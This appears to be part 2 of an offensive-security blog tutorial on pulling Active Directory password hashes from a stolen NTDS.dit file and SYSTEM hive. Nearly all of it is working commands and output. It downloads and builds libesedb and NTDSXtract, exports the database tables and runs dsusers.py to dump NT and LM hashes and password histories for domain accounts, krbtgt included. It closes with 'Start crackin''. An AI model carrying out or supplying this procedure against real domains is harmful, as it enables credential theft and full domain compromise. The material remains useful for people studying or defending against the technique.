Volume Shadow Copy NTDS.DIT Domain Hashes Remotely - Part 2

Part 2, we have the NTDS.dit file and the SYSTEM.hive file. First we need a few tools:

From: http://www.ntdsxtract.com/

Download: http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

From: http://code.google.com/p/libesedb/

Download: http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

wget http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

Extract the tools:

tar zxvf libesedb-alpha-20120102.tar.gz
unzip ntdsxtract_v1_0.zip

Compile/make libesedb:

root@wpad:~/blog/# cd libesedb-20120102
root@wpad:~/blog/libesedb-20120102# ./configure 
root@wpad:~/blog/libesedb-20120102# make

Export the tables from NTDS.dit:

root@wpad:~/blog/libesedb-20120102# cd esedbtools/
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport 
esedbexport 20120102

Missing source file.
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
                   [ -T table_name ] [ -hvV ] source

	source: the source file

	-c:     codepage of ASCII strings, options: ascii, windows-874,
	        windows-932, windows-936, windows-1250, windows-1251,
	        windows-1252 (default), windows-1253, windows-1254
	        windows-1255, windows-1256, windows-1257 or windows-1258
	-h:     shows this help
	-l:     logs information about the exported items
	-m:     export mode, option: all, tables (default)
	        'all' exports all the tables or a single specified table with indexes,
	        'tables' exports all the tables or a single specified table
	-t:     specify the basename of the target directory to export to
	        (default is the source filename) esedbexport will add the suffix
	        .export to the basename
	-T:     exports only a specific table
	-v:     verbose output to stderr
	-V:     print version
root@wpad:~/blog/libesedb-20120102/esedbtools# 


root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport ../../ntds.dit 
esedbexport 20120102

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.

Move the exported tables to somewhere a bit easier:

root@wpad:~/blog/libesedb-20120102/esedbtools# 
root@wpad:~/blog/libesedb-20120102/esedbtools# mv ntds.dit.export/ ../../

NTDS extract can do a lot more than just hashes:

root@wpad:~/blog# cd NTDSXtract\ 1.0/
root@wpad:~/blog/NTDSXtract 1.0# ls
dscomputers.py  dsdeletedobjects.py  dsfileinformation.py  dsgroups.py  dstimeline.py  dsusers.py  framework  ntds
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py 
DSUsers
Extracts information related to user objects

usage: dsusers.py   [option]
  options:
    --rid 
          List user identified by RID
    --name 
          List user identified by Name
    --passwordhashes 
          Extract password hashes
    --passwordhistory 
          Extract password history
    --certificates
          Extract certificates
    --supplcreds 
          Extract kerberos keys
    --membership
          List groups of which the user is a member
root@wpad:~/blog/NTDSXtract 1.0# 

But we like hashes:

root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive 
Running with options:
	Extracting password hashes
	Extracting password history
Initialising engine...
Scanning database - 100% -> 3475 records processed
Extracting schema information - 100% -> 1549 records processed
Extracting object links...

List of users:
==============

Record ID:           3562
User name:           Administrator
User principal name: 
SAM Account name:    Administrator
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 7ceee337-fa58-4ca0-9643-540a40161020
SID:  S-1-5-21-3825330677-773554443-1603823854-500
When created:         2012-08-22 03:12:59
When changed:         2013-05-15 04:06:55
Account expires:      Never
Password last set:    2012-08-22 02:49:42.899576
Last logon:           2013-05-15 04:08:04.547236
Last logon timestamp: 2013-05-15 04:06:55.577353
Bad password time     2013-06-07 02:34:34.560516
Logon count:          9
Bad password count:   1
User Account Control:
	NORMAL_ACCOUNT
Ancestors:
	$ROOT_OBJECT$ net projectmentor Users Administrator 
Password hashes:
	Administrator:$NT$88e4d9fabaecf3ded18dd80905521b29:::
Password history:

Record ID:           3563
User name:           Guest
User principal name: 
SAM Account name:    Guest
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 659723d7-1246-4959-b0fc-af80ea5e3816
SID:  S-1-5-21-3825330677-773554443-1603823854-501
When created:         2012-08-22 03:12:59
When changed:         2013-03-14 06:54:22
Account expires:      Never
Password last set:    2013-03-14 06:54:22.029303
Last logon:           2013-03-14 06:54:27.012817
Last logon timestamp: 2013-03-14 06:32:41.834022
Bad password time     2013-06-07 03:07:46.499917
Logon count:          0
Bad password count:   10
User Account Control:
	PWD Not Required
	NORMAL_ACCOUNT
	PWD Never Expires
Ancestors:
	$ROOT_OBJECT$ net projectmentor Users Guest 
Password hashes:
	Guest:$NT$823893adfad2ada6e1a414f3ebdf58f7:::
Password history:

Record ID:           3564
User name:           user
User principal name: 
SAM Account name:    user
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: c5a5c87a-93b4-4d80-97a1-1c605b9b0c03
SID:  S-1-5-21-3825330677-773554443-1603823854-1000
When created:         2012-08-22 03:12:59
When changed:         2013-06-07 02:51:54
Account expires:      Never
Password last set:    2013-03-14 03:25:11.793912
Last logon:           2013-06-07 02:51:54.152191
Last logon timestamp: 2013-06-07 02:51:54.152191
Bad password time     2013-04-19 05:25:40.412670
Logon count:          67
Bad password count:   0
User Account Control:
	NORMAL_ACCOUNT
	PWD Never Expires
Ancestors:
	$ROOT_OBJECT$ net projectmentor Users user 
Password hashes:
	user:$NT$88e4d9fabaecf3dec18dd80905521b29:::
Password history:
	user_nthistory0:$NT$88e4d9fabafcf3dec18dd80905521b29:::
	user_nthistory1:$NT$0c61031f010b2fbb88fe449fbf262477:::
	user_nthistory2:$NT$88e4dffabaecf3dec18dd80905521b29:::
	user_lmhistory0:c869027e01c3c4fe7626a90c87cc7fed:::
	user_lmhistory1:8be023cd858da1edd21b94907afe182c:::

Record ID:           3610
User name:           krbtgt
User principal name: 
SAM Account name:    krbtgt
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 74e6bd0b-e4d5-42df-98d5-24f9060061c9
SID:  S-1-5-21-3825330677-773554443-1603823854-502
When created:         2012-08-22 03:16:03
When changed:         2012-08-22 03:31:13
Account expires:      Never
Password last set:    2012-08-22 03:16:03.166457
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          0
Bad password count:   0
User Account Control:
	Disabled
	NORMAL_ACCOUNT
Ancestors:
	$ROOT_OBJECT$ net projectmentor Users krbtgt 
Password hashes:
	krbtgt:$NT$7253e8647254716b507a2dcb149ff2da:::
Password history:
	krbtgt_nthistory0:$NT$7253e86a7254716a507a2dcb149ff2da:::
	krbtgt_lmhistory0:113926e06a31d182623633041b632929:::

Record ID:           3762
User name:           John Doe
User principal name: jdoe@projectmentor.net
SAM Account name:    jdoe
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: bbf24c63-39a9-4cc4-8aa8-933f9ddee940
SID:  S-1-5-21-3825330677-773554443-1603823854-1104
When created:         2012-08-22 04:10:52
When changed:         2013-06-05 13:04:11
Account expires:      Never
Password last set:    2013-04-19 07:11:49.849592
Last logon:           2013-06-07 02:56:25.677855
Last logon timestamp: 2013-06-05 13:04:11.674344
Bad password time     2013-05-02 03:01:12.536251
Logon count:          242
Bad password count:   0
User Account Control:
	NORMAL_ACCOUNT
	PWD Never Expires
Ancestors:
	$ROOT_OBJECT$ net projectmentor Users John Doe 
Password hashes:
	John Doe:$NT$88e4d9fabaecf3ded18dd80905511b29:::
Password history:

Record ID:           3797
User name:           Random User
User principal name: randy@projectmentor.net
SAM Account name:    randy
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 2701eb29-628a-4568-a093-d33a7db10d04
SID:  S-1-5-21-3825330677-773554443-1603823854-1108
When created:         2013-04-08 02:34:04
When changed:         2013-05-27 16:06:07
Account expires:      Never
Password last set:    2013-04-19 06:59:25.423280
Last logon:           2013-04-08 02:34:10.482690
Last logon timestamp: 2013-04-08 02:34:10.482690
Bad password time     Never
Logon count:          1
Bad password count:   0
User Account Control:
	NORMAL_ACCOUNT
	PWD Never Expires
Ancestors:
	$ROOT_OBJECT$ net projectmentor Users Random User 
Password hashes:
	Random User:$NT$88ead9fa5aecf3dec18dd80905521b29:::
Password history:
root@wpad:~/blog/NTDSXtract 1.0# 

All done. Start crackin'